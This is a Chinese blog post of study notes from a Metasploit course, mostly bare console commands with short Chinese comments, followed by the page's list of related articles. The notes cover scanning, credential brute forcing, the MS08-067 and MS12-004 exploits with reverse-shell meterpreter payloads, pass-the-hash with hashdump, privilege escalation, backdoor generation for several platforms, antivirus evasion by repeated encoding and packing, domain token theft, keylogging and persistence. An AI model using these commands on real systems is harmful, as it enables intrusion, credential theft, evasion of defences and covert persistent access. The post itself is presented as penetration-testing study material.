羽翼metasploit第一,二季学习笔记

最新推荐文章于 2024-05-03 11:14:06 发布
最新推荐文章于 2024-05-03 11:14:06 发布
阅读量2.4k 收藏 6
点赞数
分类专栏: 渗透测试 文章标签: metasploit 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Luosec/article/details/60779199
版权
-----------------第一季--------------------
启动Metasploit:msfconsole


升级和更新:./msfupdate


直接退出:exit 退回上一级:quit






1.端口扫描:
a.调用Nmap扫描
nmap -v -sV ip
b.调用msf模块扫描(1)
 use auxiliary/scanner/portscan/syn
 show options
 set INTERFACE 网卡
 set PORTS 端口
 set RHOSTS IP/24 (24是网路遮罩, 因为ipv4全长32个bit, 所以32-24=8, 也就是遮罩大小为2的8次方, 也就是256个ip可以使用)
 set THREADS 100
 run






2.SMB扫描_获取系统信息
 msfconsole
 use auxiliary/scanner/smb/smb_version
 show options
 set RHOST IP
(假如ip是192.168.1.1,要扫描多个ip可以set RHOS 192.168.1.1-200)
 set THREADS 10
 run




3.服务识别(ssh)
 msfconsole
 use auxiliary/scanner/ssh/ssh_version
 show options
 set RHOST IP
 run


服务识别(FTP)
 use auxiliary/scanner/ftp/ftp_version
 show options
 set FTPUSER
 set RHOST IP
 run








4.密码嗅探
 msfconsole
 use auxiliary/sniffer/psnuffle
 show options
 run










5.SNMP扫描与枚举
 msfconsole
 search snmp
 use auxiliary/scanner/snmp/snmp_login
 show options
 set RHOST IP
 set THREADS 10
 run




 use auxiliary/scanner/snmp/snmp_enum
 set RHOST IP
 set THREADS 10
 run






6.SMB登陆验证
 msfconsole
 use auxiliary/scanner/smb/smb_login
 show options
 set RHOST IP
 set SMBUser administrator
 set THREADS 100
 run








7.VNC身份验证
 msfconsole
 use auxiliary/scanner/vnc/vnc_none_auth
 show options
 set RHOST IP
 set THREADS 100
 run




8.WMAP Web扫描(http://www.2cto.com/article/201312/266601.htmls)
 msfconsole
 load wmap
 wmap_sites
 wmap_sites -a url
 wmap_sites -l
 wmap_targets -h
 wmap_targets -t url
 wmap_targets -l
 wmap_run -h
 wmap_run -t 


---------------第二季--------------
1.远程代码执行
 msfconsole
 search 08-067
 use exploit/windows/smb/ms08_067_netapi
 show options
 set RHOST IP
 show payloads
 set payload windows/meterpreter/reverse_tcp
 show options
 set LHOST ip
 info(查看影响版本)
 用nmap查看目标服务器版本
 set target 编号
 show options(检查是否已经设置好)
 exploit
 shell
 net user admin admin /add




2.MJDJ文件解析远程代码执行
 msfconsole 
 search12-004
 use exploit/windows/browser/ms12_004_midi
 show options
 set SRVHOST IP
 exploit
 set URIPATH /
 show options
 set LPORT 1244
 show options
 exploit
 sessions
 sessions -i id
 






3.口令安全
 msfconsole
 serach msql_login(ssh_login,ftp_login)
 use auxiliary/scanner/mysql/mysql_login
 set RHOST IP
 set USERNAME root
 set PASS_FILE 字典路径
 set THREAD 50
 set options(check)
 exploit






4.hash值传递渗透
(相关文章_实例解析通过Metasploit来传递哈希值:http://netsecurity.51cto.com/art/201009/227795.htm)


 msfconsole
 use/windows/smb/psexec
 show options
 set RHOST IP
 set SMMBUSER 帐号
 show options
 exploit
 hashdump(获取hash值)
 exit
 set smbpass hash
 exploit




5.NDP内核提权
前提:必须有一个session
 serarch 14-002
 use  exploit/windows/local/ms_ndproxy
 show options
 set session 1(id)
 show options
 exploit


提权:getsystem




6.多种后门的生成
a.windows后门的生成
 msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=端口 X >123.exe
 search handler
 use exploit/mulit/handler
 show options
 set payload windows/meterpreter/reverse_tcp
 show options
 set LHOST IP
 set LPORT 端口
 点击123.exe


b.linux后门的生成
 msfpayload linux/x86/shell_reverse_tcp LHOST=IP LPORT=端口 X >linux
 chmod 777 linux
 ls
 ./linux


c.java后门的生成
 msfpayload java/meterpreter/shell_reverse_tvp LHOST=IP LPORT=端口 W >123.jar
 
d.php后门的生成
 msfpayload java/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R | msfencode -e php/baes64 -t raw -o 123.php
上传到目标站-本地监听-目标访问服务器


e.安桌后门的生成
 msfpayload android/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R >1.apk
 目标运行1.apk
 本地监听
 


7.内网渗透
获得shell扫描c段
 run get_local_subnets 获取网卡
 run autoroute -s ip 扫描c段
劫持域管理
 use incognito
 impersonate_token 域
 shell
-----------------------
 use auxiliary/sniffer/psnuffle
 run
 






8.反反病毒(免杀)
 msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai - t exe>123.exe
------------------------------------------------------------------------------
 msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai -c 10 - t raw | msfencode -e x86/countdown -c 5 -t exe -o /1231.exe
-------------------------------------------------------------------------------
msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai - k -c 10
-----------------------------------------------------------------
upx -5 /1231.exe 加壳
 




9.不一样的xss(键盘记录)
 msfconsole
 search keylogger
 use auxiliary/server/capture/http_javascript_keyloger
 show options
 set DEMO true
 set URIPATH /
 set srvport 80
 run




10.维持访问
 msfconsole
 use exploit/multi/handler
 set payload windows/meterpreter/reverse_tcp
 show options
 set LHOST IP
 SET LPORT 1111
 run
 run metsvs -A
-------------------------------------------
 use exploit/multi/handler
 set payload windows/meterpreter/metsvs_bind_tcp
 show options
 set LPORT 31337
 set RHOST IP
 exploit
 keyscan_start(键盘记录)
 keyscan_dump


 
 






 
 


 








 


 
 
 
 



绅士V
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msf如何升级_Kali linux 2016.2(Rolling)中的Metasploit如何更新与目录结构初步认识...
weixin_39999586的博客
12-19 625
如何更新MSF1、Windows平台方法1:运行msfupdate.bat在msfconsole里执行命令svn update或者方法2:2、unix/linux平台方法1:运行msfupdate即可。方法2:(比较麻烦)安装subversion客户端(--with-ssl),之后连接CVS server进行MSF的更新。https://github.com/rapid7/metasploit-f...
永恒之蓝复现
weixin_45116657的博客
08-16 747
一、实验环境: kali攻击机—IP地址:192.168.85.156 Win 2008靶机—IP地址:192.168.85.152 二、实验过程: 1、扫描靶机,查看445端口是否开放; 2、复现 2.1> 在kali中打开METASPLOIT 打开控制平台:msfconsole平台 2.2> 在msfconsole平台上搜索ms17-010相关模块; search ms17-...
Metasploit 内网渗透三 —— Metasploit 渗透测试之信息搜集1 ——基于TCP协议收集主机信息(主机信息、端口状态、密码嗅探)
最新发布
天下著书立传者,皆为我师
05-03 932
实验内网渗透环境Metasploitable2-linux:靶机 192.168.234.8kali-debian:攻击机 192.168.234.141win7 虚拟机:靶机 192.168.234.158在此声明文章仅供相互学习参考,严禁利用于违法犯忌的事,任何事故自行承担!!
Metaspolit-1
weixin_54217950的博客
07-17 1227
基础简介
metasploit第一,二季学习笔记羽翼
净邪的博客
02-20 1126
               第一季启动msfconsole更新./msfupdate退回上一级quit1.端口扫描:调用Nmap扫描:可以参照一篇详细的文章戳我基础扫描:nmap -v -sV 加上要扫描的ip调用msf模块扫描使用search参数搜索相关模块:search portscan 使用use参数调用其中一个模块进行搜索use auxiliary/scanner/portscan/sy...
T00LS Metasploit(第一季).zip
03-11
T00LS社区推出的Metasploit第一季教程,旨在深入浅出地教授这个强大的工具,使初学者能够快速上手,并逐步掌握高级应用技巧。 首先,我们来了解Metasploit的基本架构。Metasploit分为四个主要部分:数据库、模块、...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8... 渗透测试1.pdf
Metasploit 整理笔记
01-10
个人Metasploit 整理笔记,整理了使用Metasploit 的记录,有利于学习Metasploit工具
Metasploit安全工程师必备/学习【魔鬼训练营】 pdf文档
11-09
Metasploit安全工程师必备/学习【魔鬼训练营】》是一个专门为安全工程师设计的深入学习资源,主要聚焦于Kali Linux中的Metasploit框架。Metasploit是信息安全领域中最广泛使用的开源工具之一,用于进行安全漏洞...
Metasploit读书笔记
09-12
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,密码审计,Web应用程序...
目前最新《Metasploit系列WEB安全渗透教程(第二季)(Tools羽翼)》
wen111111111的博客
04-08 337
Metasploit二季第01课 远程代码执行.mp4 Metasploit二季第02课 文件解析远程代码执行.mp4 Metasploit二季第03课 口令安全.mp4 Metasploit二季第04课 hash值传递渗透.mp4 Metasploit二季第05课 Ndproxy内核提权.mp4 Metasploit二季第06课 多种后面生成....
MSF笔记
super_m@n的博客
12-18 363
全称:metasploit 0*01模块介绍 /usr/share/metasploit-framework/modules auxiliary用于各种辅助功能 比如:信息收集、枚举、指纹探测、扫描 encoders编码模块,对payload进行加密 evasion exploits漏洞利用脚本目录 nops维持payload稳定性 payloads post 0*02简...
网络安全:MSF常用命令总结
Mr_qing的博客
11-03 1900
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
kali 升级msf到msf6
liulanghouzi的博客
12-04 5692
安装kali过程注意不要使用网络镜像,以及将grub安装至硬盘时选择/dev/sda,其它一律默认即可 安装好kali后,启动msf,发现版本很旧,没有近期的cve,打算升级一下。 但是输入apt-get update;apt-get install metasploit-framework,告诉我msf已经是最新,无须更新。 原因是安装kali时没有使用网络镜像,启动kali后又没有设置apt源,没有源当然无法更新啊。 打开/etc/apt/sources.list,添加国内镜像源: deb
Metasploit基本使用
qq_68233961的博客
11-05 675
Metasploit基本使用
kali中msf自动更新
qq_43017796的博客
07-17 6047
现版本kali已无法使用msfupdate进行更新。 1.apt update 查看当前可更新内容 2.apt install metasploit-framework 3.输入msfconsole,即可查看当前更新后的版本。
ms17永恒之蓝漏洞复现全过程(kali-server2003)
AmyBaby00的博客
11-12 2546
本文为学习笔记,仅限学习交流。 不得利用、从事危害国家或人民安全、荣誉和利益等活动。 请参阅《中华人民共和国网络安全法》 永恒之蓝是利用Windows操作系统445端口存在的漏洞进行传播,并具有自我复制、主动传播的特性。 基于Windows网络共享协议进行攻击传播的蠕虫恶意代码 一、测试准备: 目标机:server 2003 攻击机:kali 利用Nmap扫描IP ,查看已开启端口 发现445端口...
Kali ❀ 系统升级与更新说明
无糖可乐没有灵魂
04-26 270
文章目录1、选择不更新metasploit2、配置更新源(1)dpkg(2)gdebi 1、选择不更新metasploit 查看当前系统中所有的安装包 root@kali:~# sudo dpkg --get-selections | more 给metasploit-framework绑定当前版本不更新 root@kali:~# sudo apt-mark hold metasploit-framework metasploit-framework set on hold. 查看当前锁定的软件包 ro
Metasploit实战:第二课破解Metasploitable2的多重漏洞
第二课 Metasploit对Matasplioit的攻击"的详细教程,由陈殷编写并发布于山丘安全攻防实验室的公众号。Metasploitable2是一款特别设计的安全测试工具,它基于Ubuntu操作系统,专为演示和研究常见的漏洞攻击而构建。这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值